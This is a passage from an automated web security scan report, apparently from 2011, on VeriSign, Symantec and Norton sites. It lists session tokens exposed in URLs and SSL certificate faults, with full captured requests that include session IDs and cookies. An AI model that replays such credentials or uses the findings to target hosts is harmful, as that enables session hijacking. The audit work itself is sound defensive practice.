HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 154 Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/ubox/image
Issue detail
The URL in the request appears to contain a session token within the query string:
http://mbox3.offermatica.com/m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25
Request
GET /m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 302 Moved Temporarily Location: http://www.verisign.com/stellent/groups/public/documents/image/spacer.gif Content-Length: 0 Date: Fri, 09 Sep 2011 21:24:33 GMT Server: Test & Target
7.8. http://player.ooyala.com/sas/authorized
Summary
Severity: Medium
Confidence: Firm
Host: http://player.ooyala.com
Path: /sas/authorized
Issue detail
The URL in the request appears to contain a session token within the query string: http://player.ooyala.com/sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7
Request
GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk &domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Status: 200 OK Content-Type: text/xml Content-Length: 716 Cache-Control: public, no-cache Date: Fri, 09 Sep 2011 21:26:08 GMT Connection: close iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9 kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO JotiY/UdyOFK+TiH1...[SNIP]...
7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif
Summary
Severity: Medium
Confidence: Firm
Host: https://renewals.symantec.com
Path: /renewals/images/icon-pop-up.gif
Issue detail
The URL in the request appears to contain a session token within the query string: https://renewals.symantec.com/renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Request
GET /renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435 HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:50 GMT Content-Length: 60 Content-Type: image/gif Last-Modified: Thu, 18 Mar 2010 01:42:30 GMT Accept-Ranges: bytes GIF89a . .....G....!.......,.... . ......g.....O...U...-G..;
7.10. http://sales.liveperson.net/hc/2735064/
Summary
Severity: Medium
Confidence: Firm
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The URL in the request appears to contain a session token within the query string: http://sales.liveperson.net/hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true
Request
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50 &SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064 Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998 lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
7.11. https://securitycenter.verisign.com/celp/enroll/retail
Summary
Severity: Medium
Confidence: Firm
Host: https://securitycenter.verisign.com
Path: /celp/enroll/retail
Issue detail
The URL in the request appears to contain a session token within the query string: https://securitycenter.verisign.com/celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:17 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
Summary
Severity: Medium
Confidence: Firm
Host: http://symantec.tt.omtrdc.net
Path: /m2/symantec/mbox/standard
Issue detail
The URL in the request appears to contain a session token within the query string: http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39
Request
GET /m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442 &mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39 HTTP/1.1 Host: symantec.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://us.norton.com/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
Response
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 1591 Date: Fri, 09 Sep 2011 21:30:58 GMT Server: Test & Target var mboxCurrent=mboxFactories.get('default').get('norton_lp_redirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau...[SNIP]...
7.13. https://trust-center.verisign.com/process/retail/trust_product_selector
Summary
Severity: Medium
Confidence: Firm
Host: https://trust-center.verisign.com
Path: /process/retail/trust_product_selector
Issue detail
The URL in the request appears to contain a session token within the query string: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c &product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]...
7.14. http://vipmobile.verisign.com/images/favicon.ico
Summary
Severity: Medium
Confidence: Firm
Host: http://vipmobile.verisign.com
Path: /images/favicon.ico
Issue detail
The URL in the request appears to contain a session token within the query string: http://vipmobile.verisign.com/images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2
Request
GET /images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2 HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; __fds_fp_id__=44590564957.2; JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 22:04:01 GMT Server: Apache Location: http://vipmobile.verisign.com/images/favicon.ico Content-Length: 328 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://vipmobile.verisi...[SNIP]...
7.15. https://vipmobile.verisign.com/home.v
Summary
Severity: Medium
Confidence: Firm
Host: https://vipmobile.verisign.com
Path: /home.v
Issue detail
The URL in the request appears to contain a session token within the query string: https://vipmobile.verisign.com/home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1
Request
GET /home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1 HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:52:05 GMT Server: Apache Location: https://vipmobile.verisign.com/home.v Content-Length: 318 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://vipmobile.veris...[SNIP]...
8. SSL certificate
There are 37 instances of this issue:
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed. It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
8.1. https://fileconnect.symantec.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://fileconnect.symantec.com
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not trusted. The server presented the following certificate: Issued to: FILECONNECT.SYMANTEC.COM Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Jul 07 18:00:00 GMT-06:00 2011 Valid to: Sat Jul 07 17:59:59 GMT-06:00 2012
8.2. https://forms.verisign.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://forms.verisign.com
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not trusted. The server presented the following certificate: Issued to: forms.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Sun May 29 18:00:00 GMT-06:00 2011 Valid to: Wed May 29 17:59:59 GMT-06:00 2013
8.3. https://knowledge.verisign.ch/
Summary
Severity: Medium
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /
Issue detail
The following problems were identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server's certificate is not trusted. The server presented the following certificates: Server certificate Issued to: vrsn-intl.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue Jun 08 18:00:00 GMT-06:00 2010 Valid to: Fri Jun 08 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #2 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #3 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
8.4. https://knowledge.verisign.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not trusted. The server presented the following certificates: Server certificate Issued to: knowledge.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue Feb 02 18:00:00 GMT-06:00 2010 Valid to: Mon Feb 20 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #2 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #3 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
8.5. https://onlinefamily.norton.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://onlinefamily.norton.com
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server presented the following certificates: Server certificate Issued to: www.onlinefamily.norton.com Issued by: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Valid from: Tue Oct 05 18:00:00 GMT-06:00 2010 Valid to: Thu Oct 06 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Issued by: Class 3 Public Primary Certification Authority Valid from: Wed Apr 16 18:00:00 GMT-06:00 1997 Valid to: Mon Oct 24 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.6. https://query.verisign.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://query.verisign.com
Path: /
Issue detail
The following problems were identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server's certificate is not trusted. The server presented the following certificates: Server certificate Issued to: query-ncsa.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Sun Feb 13 18:00:00 GMT-06:00 2011 Valid to: Tue Mar 05 17:59:59 GMT-06:00 2013
Certificate chain #1 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #2 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #3 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
8.7. https://ssl-certificate-center.verisign.ch/
Summary
Severity: Medium
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server presented the following certificates: Server certificate Issued to: ssl-certificate-center-emea.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.8. https://ssl-certificate-center.verisign.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /
Issue detail
